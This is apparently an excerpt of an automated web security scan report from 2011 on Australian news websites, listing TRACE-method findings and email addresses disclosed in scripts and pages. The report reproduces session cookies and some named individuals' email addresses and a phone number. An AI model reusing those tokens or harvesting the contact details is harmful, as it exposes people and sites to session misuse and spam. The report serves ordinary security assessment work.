Cookie: 7e741ecc49313397; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%
...[SNIP]...

16.7. http://secure-au.imrworldwide.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secure-au.imrworldwide.com
Path:	/

Request

TRACE / HTTP/1.0
Host: secure-au.imrworldwide.com
Cookie: c7de791de4c122cc

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:32 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: c7de791de4c122cc; V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8
Host: secure-au.imrworldwide.com

16.8. http://tap.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: tap.rubiconproject.com
Cookie: 96b6215de764bfdf

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:25 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tap.rubiconproject.com
Cookie: 96b6215de764bfdf; put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=1
...[SNIP]...

16.9. http://www.7perth.com.au/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.7perth.com.au
Path:	/

Request

TRACE / HTTP/1.0
Host: www.7perth.com.au
Cookie: c4557ddd017193f8

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Wed, 07 Sep 2011 14:14:19 GMT
Server: Apache/2.2.16 (Amazon)
Content-Length: 212
Connection: Close

TRACE / HTTP/1.1
host: www.7perth.com.au
Cookie: c4557ddd017193f8; PHPSESSID=ifm3c4tfcqeoamntp6t3t0q3u2
X-Forwarded-For: 50.23.123.106
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive

17. Email addresses disclosed previous next
There are 20 instances of this issue:

http://ajax.googleapis.com/ajax/libs/scriptaculous/1.9/controls.js
http://feeds.mycareer.com.au/jobresults
http://media.mytalk.com.au/6pr/audio/paul_papalia_070911.mp3
http://media.news.com.au/cs/newscomau/v1.5/base-patch-v2.js
http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mt.mytalknetwork.js
http://resources1.news.com.au/cs/network/js/library/base-modules-concat-min.js
http://weather.news.com.au/includes/optigraph/optigraph.min.js
http://weather.news.com.au/includes/optigraph/thermometer.min.js
http://www.7perth.com.au/js/wforms.js
http://www.7perth.com.au/view/2/
http://www.7perth.com.au/view/seven-news/
http://www.abc.net.au/includes/scripts/jquery/plugins/jquery.hoverIntent.minified.js
http://www.bcl.com.au/highlight.js
http://www.ntnews.com.au/scripts/form-validate.js
http://www.ntnews.com.au/scripts/global.js
http://www.perthnow.com.au/
http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
http://www.themercury.com.au/scripts/form-validate.js
http://www.watoday.com.au/
http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

17.1. http://ajax.googleapis.com/ajax/libs/scriptaculous/1.9/controls.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ajax.googleapis.com
Path:	/ajax/libs/scriptaculous/1.9/controls.js

Issue detail

The following email address was disclosed in the response:

tdd@tddsworld.com

Request

GET /ajax/libs/scriptaculous/1.9/controls.js HTTP/1.1
Host: ajax.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.7perth.com.au/view/seven-news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Thu, 30 Jun 2011 16:54:51 GMT
Date: Wed, 07 Sep 2011 14:14:23 GMT
Expires: Wed, 07 Sep 2011 15:14:23 GMT
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=3600
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 34787

// script.aculo.us controls.js v1.9.0, Thu Dec 23 16:54:48 -0500 2010

// Copyright (c) 2005-2010 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2010 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

17.2. http://feeds.mycareer.com.au/jobresults previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.mycareer.com.au
Path:	/jobresults

Issue detail

The following email address was disclosed in the response:

liam.watson@hays.com.au

Request

GET /jobresults?s=102&state=nsw&c=6&s_cid=597799&format=xml HTTP/1.1
Host: feeds.mycareer.com.au
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2878385/jb_180x60_190411.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 56985
Content-Type: text/xml; charset=utf-8
Expires: Wed, 07 Sep 2011 15:15:03 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Wed, 07 Sep 2011 14:15:02 GMT

<?xml version="1.0" encoding="utf-8"?><data><job><title>Mechanical Drafter - Revit Software - Large Scale</title><author>Clements Recruitment</author><salary><minamount>0</minamount><maxamount>0</maxa
...[SNIP]...
<![CDATA[Career move into mining/minerals drafting and design contact Liam Watson on 02 9249 2210 or email liam.watson@hays.com.au]]>
...[SNIP]...

17.3. http://media.mytalk.com.au/6pr/audio/paul_papalia_070911.mp3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.mytalk.com.au
Path:	/6pr/audio/paul_papalia_070911.mp3

Issue detail

The following email address was disclosed in the response:

X@NhQTX.pe

Request

GET /6pr/audio/paul_papalia_070911.mp3 HTTP/1.1
Host: media.mytalk.com.au
Proxy-Connection: keep-alive
Referer: http://www.6pr.com.au/blogs/6pr-perth-blog/claws-out-for-cat-laws/20110907-1jwus.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: audio/mpeg
Last-Modified: Wed, 07 Sep 2011 02:21:02 GMT
Accept-Ranges: bytes
ETag: "87e3fca46dcc1:0"
Server: Microsoft-IIS/7.5
Date: Wed, 07 Sep 2011 14:20:06 GMT
Content-Length: 9471744

...d.....i...... .............4......4...".-..6c@......4.E...a.5.O.......`0.6@........3...8...d@^.. ..&.H..08......`2x-...v.....w..26!...`.c. 2T...(... ..R..0`.....`&..A.....0..@.8A.....2.@0..?...
...[SNIP]...
<.s.........D.Fc..^...,.e...RT..D......!.r.............yE...c.
(y. g.w......r..N.x,.C.p..Ft.lj.......y.w..#.>.J.Z...Xt..Rald.(#.......X@NhQTX.pe[......U'K..........>
...[SNIP]...

17.4. http://media.news.com.au/cs/newscomau/v1.5/base-patch-v2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.news.com.au
Path:	/cs/newscomau/v1.5/base-patch-v2.js

Issue detail

The following email address was disclosed in the response:

andris.reinman@gmail.com

Request

GET /cs/newscomau/v1.5/base-patch-v2.js HTTP/1.1
Host: media.news.com.au
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "92b01e38e38d43caecad97aef10a2f25:1315368542"
Last-Modified: Wed, 07 Sep 2011 04:09:02 GMT
Accept-Ranges: bytes
Content-Length: 141392
Content-Type: application/x-javascript
Date: Wed, 07 Sep 2011 14:14:27 GMT
Connection: close

// ../v2/_shared/base/js/thirdparty/jquery.json.min.js

(function($){$.toJSON=function(o)
{if(typeof(JSON)=='object'&&JSON.stringify)
return JSON.stringify(o);var type=typeof(o);if(o===null)
return
...[SNIP]...
------
* Simple local storage wrapper to save data on the browser side, supporting
* all major browsers - IE6+, Firefox2+, Safari4+, Chrome4+ and Opera 10.5+
*
* Copyright (c) 2010 Andris Reinman, andris.reinman@gmail.com
* Project homepage: www.jstorage.info
*
* Licensed under MIT-style license:
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated doc
...[SNIP]...

17.5. http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mt.mytalknetwork.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://resources.6pr.f2.com.au
Path:	/myTalkNetwork/core/2008-04/js/fd.mt.mytalknetwork.js

Issue detail

The following email address was disclosed in the response:

delkan@fairfaxdigital.com.au

Request

GET /myTalkNetwork/core/2008-04/js/fd.mt.mytalknetwork.js HTTP/1.1
Host: resources.6pr.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.6pr.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 07 Sep 2011 14:14:34 GMT
Content-Type: application/x-javascript
Last-Modified: Fri, 02 Sep 2011 23:13:21 GMT
Connection: keep-alive
Expires: Wed, 07 Sep 2011 15:14:34 GMT
Cache-Control: max-age=3600
Cache-Control: public, proxy-revalidate
Content-Length: 56189

/*
Script: Core.js
   Mootools - My Object Oriented javascript.

License:
   MIT-style license.

MooTools Copyright:
   copyright (c) 2007 Valerio Proietti, <http://mad4milk.net>

MooTools Credits:
   - Class
...[SNIP]...
<delkan@fairfaxdigital.com.au>
...[SNIP]...

17.6. http://resources1.news.com.au/cs/network/js/library/base-modules-concat-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://resources1.news.com.au
Path:	/cs/network/js/library/base-modules-concat-min.js

Issue detail

The following email address was disclosed in the response:

news@news.com.au

Request

GET /cs/network/js/library/base-modules-concat-min.js HTTP/1.1
Host: resources1.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 01 Sep 2011 00:11:20 GMT
ETag: "95848c-22b18-4abd61590ba00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 142104
Content-Type: application/x-javascript
X-Cache-Lookup: MISS from news.com.au:80
Cache-Control: max-age=776
Expires: Wed, 07 Sep 2011 14:27:01 GMT
Date: Wed, 07 Sep 2011 14:14:05 GMT
Connection: close

(function(b){var a=b;b.fn.nAccordionTable=function(c){b(this).each(function(){var g=b.extend({handle:".js-acc-handle",content:".js-acc-content",openClass:"js-acc-open",closedClass:"js-acc-closed",hand
...[SNIP]...
<a href="mailto:news@news.com.au">news@news.com.au</a>
...[SNIP]...

17.7. http://weather.news.com.au/includes/optigraph/optigraph.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weather.news.com.au
Path:	/includes/optigraph/optigraph.min.js

Issue detail

The following email address was disclosed in the response:

dhowe@weatherzone.com.au

Request

GET /includes/optigraph/optigraph.min.js HTTP/1.1
Host: weather.news.com.au
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.31
Last-Modified: Mon, 29 Nov 2010 04:45:12 GMT
ETag: "3f8340-3470-49629bcc9a600"
Accept-Ranges: bytes
Content-Length: 13424
Content-Type: application/javascript
Cache-Control: max-age=28800
Expires: Wed, 07 Sep 2011 22:14:28 GMT
Date: Wed, 07 Sep 2011 14:14:28 GMT
Connection: close

// Copyright 2010 Weatherzone. All rights reserved.

/**
* @fileoverview Opticast Graphing tool - aka "Optigraph".
* Requires Raphael (www.raphaeljs.com) to draw the vectors; VML in IE, SVG in
* proper browsers.
* Requires jQuery for detecting events.
* @author dhowe@weatherzone.com.au (Dan Howe)
*/

Raphael.fn.optigraphExtensions={windArrow1:function(a,c){var b=[];b.push(["M",a-3,c+8]);b.push(["L",a+3,c+8]);b.push(["L",a+3,c]);b.push(["L",a+3+3,c]);b.push(["L",a,c-10]);b.push(["L"
...[SNIP]...

17.8. http://weather.news.com.au/includes/optigraph/thermometer.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weather.news.com.au
Path:	/includes/optigraph/thermometer.min.js

Issue detail

The following email address was disclosed in the response:

dhowe@weatherzone.com.au

Request

GET /includes/optigraph/thermometer.min.js HTTP/1.1
Host: weather.news.com.au
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.31
Last-Modified: Mon, 29 Nov 2010 04:45:12 GMT
ETag: "3f8346-1125-49629bcc9a600"
Accept-Ranges: bytes
Content-Length: 4389
Content-Type: application/javascript
Cache-Control: max-age=1911
Expires: Wed, 07 Sep 2011 14:46:18 GMT
Date: Wed, 07 Sep 2011 14:14:27 GMT
Connection: close

// Copyright 2010 Weatherzone. All rights reserved.

/**
* @fileoverview Thermometer 'widget'.
* Requires Raphael (www.raphaeljs.com) to draw the vectors; VML in IE, SVG in
* proper browsers.
* Requires jQuery for detecting events.
* @author dhowe@weatherzone.com.au (Dan Howe)
*/

thermometer=function(h,f,b,j,a,l){a=a==null?"Today's Forecast":a;l=l==null?"Tonight's Forecast":l;this.paper=Raphael(h,140,190);this.tempScaleRange=[0,20];if((b+5)>
...[SNIP]...

17.9. http://www.7perth.com.au/js/wforms.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.7perth.com.au
Path:	/js/wforms.js

Issue detail

The following email address was disclosed in the response:

pro@4213miles.com

Request

GET /js/wforms.js HTTP/1.1
Host: www.7perth.com.au
Proxy-Connection: keep-alive
Referer: http://www.7perth.com.au/view/seven-news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ifm3c4tfcqeoamntp6t3t0q3u2

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/javascript
Date: Wed, 07 Sep 2011 14:14:20 GMT
ETag: "e73047b09221ce20429b35ef158dcbd8"
Last-Modified: Thu, 18 Aug 2011 02:37:22 GMT
Server: AmazonS3
x-amz-id-2: LMfyFkEsqFK9Pt/O2CzCbJDdKYAu47eMhCxBK3kBpkvPd0hPpYEX4ddWNxdTxy7n
x-amz-request-id: 8B23EAB1CB2B89D2
Content-Length: 43262
Connection: keep-alive

// wForms - a javascript extension to web forms.
// v0.99.23 - July 26 2005
// Copyright (c) 2005 C.dric Savarese <pro@4213miles.com>
// This software is licensed under the CC-GNU LGPL <http://creativ
...[SNIP]...

17.10. http://www.7perth.com.au/view/2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.7perth.com.au
Path:	/view/2/

Issue detail

The following email addresses were disclosed in the response:

newspics@7perth.com.au
ttpics@7perth.com.au

Request

Response

17.11. http://www.7perth.com.au/view/seven-news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.7perth.com.au
Path:	/view/seven-news/

Issue detail

The following email address was disclosed in the response:

news@7perth.com.au

Request

Response

17.12. http://www.abc.net.au/includes/scripts/jquery/plugins/jquery.hoverIntent.minified.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/includes/scripts/jquery/plugins/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /includes/scripts/jquery/plugins/jquery.hoverIntent.minified.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/news/2011-09-07/christmas-island-inquest-reopens/2875554/?site=perth&section=news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABCGuestID=http%3A//www.abc.net.au/perth/news/%3DPerth%20News%20-%20ABC%20Perth%20-%20Australian%20Broadcasting%20Corporation; __utma=242052946.1543285740.1315422868.1315422868.1315422868.1; __utmb=242052946.2.10.1315422868; __utmc=242052946; __utmz=242052946.1315422868.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315476868902:ss=1315476868902; SiteLifeHost=SJL02WSITEMABC1proddmlocal; anonId=f1e9cf78-d41c-4410-9c98-2b8c34e350af

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 01 Feb 2010 02:32:33 GMT
ETag: "e73961-649-cc291240"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=16950
Expires: Wed, 07 Sep 2011 19:01:06 GMT
Date: Wed, 07 Sep 2011 14:18:36 GMT
Content-Length: 1609
Connection: close

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

17.13. http://www.bcl.com.au/highlight.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bcl.com.au
Path:	/highlight.js

Issue detail

The following email address was disclosed in the response:

zoom@wrensoft.com

Request

GET /highlight.js HTTP/1.1
Host: www.bcl.com.au
Proxy-Connection: keep-alive
Referer: http://www.bcl.com.au/perth/news.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 10 Feb 2011 06:13:17 GMT
Accept-Ranges: bytes
ETag: "875ad19be9c8cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 14:14:29 GMT
Content-Length: 9722

// ----------------------------------------------------------------------------
// Zoom Search Engine 6.0 (6/Mar/2008)
// Highlight & auto-scroll script
//
// DOM manipulation version
//
// This
...[SNIP]...
bal innerHTML object. This alternative
// implementation may help you if you are having problems with getting the
// highlight script to run compatibly with your other Javascripts.
//
// email: zoom@wrensoft.com
// www: http://www.wrensoft.com
//
// Copyright (C) Wrensoft 2008
// ----------------------------------------------------------------------------
// Use this script to allow your search matches t
...[SNIP]...

17.14. http://www.ntnews.com.au/scripts/form-validate.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ntnews.com.au
Path:	/scripts/form-validate.js

Issue detail

The following email address was disclosed in the response:

cmonline@qnp.newsltd.com.au

Request

GET /scripts/form-validate.js HTTP/1.1
Host: www.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/article/2011/09/07/258681_ntnews.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sopsview=1; NetInsightSessionID=1; UnicaNIODID=JML4bfhEwu5-XJ0QlB7; __utma=124295189.1286976136.1315422940.1315422940.1315422940.1; __utmb=124295189.1.10.1315422940; __utmc=124295189; __utmz=124295189.1315422940.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "4d87ef10f6d879c6bcd987f18f6706e2:1291072218"
Last-Modified: Mon, 29 Nov 2010 23:10:18 GMT
Accept-Ranges: bytes
Content-Length: 14851
Content-Type: application/x-javascript
Date: Wed, 07 Sep 2011 14:17:08 GMT
Connection: close

/**
* Form validator
**/

function keySaltEncrypt(s, key) {
s = s.toLowerCase();
var r = s.length - 4;
var f = "";
var x = 0;
for(var i = 0; i != 4; i++) {
f += s.charAt(
...[SNIP]...
<a href=\"mailto:cmonline@qnp.newsltd.com.au\">cmonline@qnp.newsltd.com.au</a>
...[SNIP]...

17.15. http://www.ntnews.com.au/scripts/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ntnews.com.au
Path:	/scripts/global.js

Issue detail

The following email address was disclosed in the response:

mihai_bazon@yahoo.com

Request

GET /scripts/global.js HTTP/1.1
Host: www.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "3e8f478f67ab51971a249f9badc3d46b:1288245304"
Last-Modified: Thu, 28 Oct 2010 05:55:04 GMT
Accept-Ranges: bytes
Content-Length: 118504
Content-Type: application/x-javascript
Date: Wed, 07 Sep 2011 14:14:53 GMT
Connection: close

/* ---- font size change ---- */
/* --------------------------- */

var curFontSize = 1.0; // curFontSize needs to be the same as the font size for paragraphs, as set in the css (in pixels)
var font
...[SNIP]...
<mihai_bazon@yahoo.com>
...[SNIP]...
<mihai_bazon@yahoo.com>
...[SNIP]...

17.16. http://www.perthnow.com.au/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.perthnow.com.au
Path:	/

Issue detail

The following email address was disclosed in the response:

news@perthnow.newsltd.com.au

Request

Response

17.17. http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.perthnow.com.au
Path:	/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884

Issue detail

The following email addresses were disclosed in the response:

business@news.com.au
business@perthnow.newsltd.com.au
news@perthnow.newsltd.com.au

Request

Response

17.18. http://www.themercury.com.au/scripts/form-validate.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.themercury.com.au
Path:	/scripts/form-validate.js

Issue detail

The following email address was disclosed in the response:

cmonline@qnp.newsltd.com.au

Request

GET /scripts/form-validate.js HTTP/1.1
Host: www.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/article/2011/09/07/259671_tasmania-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sopsview=1; NetInsightSessionID=1; UnicaNIODID=uaUyCFBgOsN-XJ0QrwN; _chartbeat2=r181cfgalzxshna8.1315422965369

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "4d87ef10f6d879c6bcd987f18f6706e2:1315386322"
Last-Modified: Wed, 07 Sep 2011 09:05:22 GMT
Accept-Ranges: bytes
Content-Length: 14851
Content-Type: application/x-javascript
Date: Wed, 07 Sep 2011 14:17:01 GMT
Connection: close

/**
* Form validator
**/

function keySaltEncrypt(s, key) {
s = s.toLowerCase();
var r = s.length - 4;
var f = "";
var x = 0;
for(var i = 0; i != 4; i++) {
f += s.charAt(
...[SNIP]...
<a href=\"mailto:cmonline@qnp.newsltd.com.au\">cmonline@qnp.newsltd.com.au</a>
...[SNIP]...

17.19. http://www.watoday.com.au/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.watoday.com.au
Path:	/

Issue detail

The following email address was disclosed in the response:

news@watoday.com.au

Request

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Sep 2011 14:14:09 GMT
Content-Length: 387687
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<a href="http://www.watoday.com.au/contact/" title="Send your news tips/photos to news@watoday.com.au">Send your news tips/photos to news@watoday.com.au</a>
...[SNIP]...

17.20. http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.watoday.com.au
Path:	/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html

Issue detail

The following email address was disclosed in the response:

news@watoday.com.au

Request

Response

18. Private IP addresses disclosed previous next
There are 28 instances of this issue:

http://connect.facebook.net/en_GB/all.js
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://media.news.com.au/news/2011/07-jul/business-markets/js/ndm.newscomau.marketstatusservice.js
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/Ii1cTFrq_I2.js
http://www.facebook.com/connect/connect.php
http://www.facebook.com/connect/connect.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
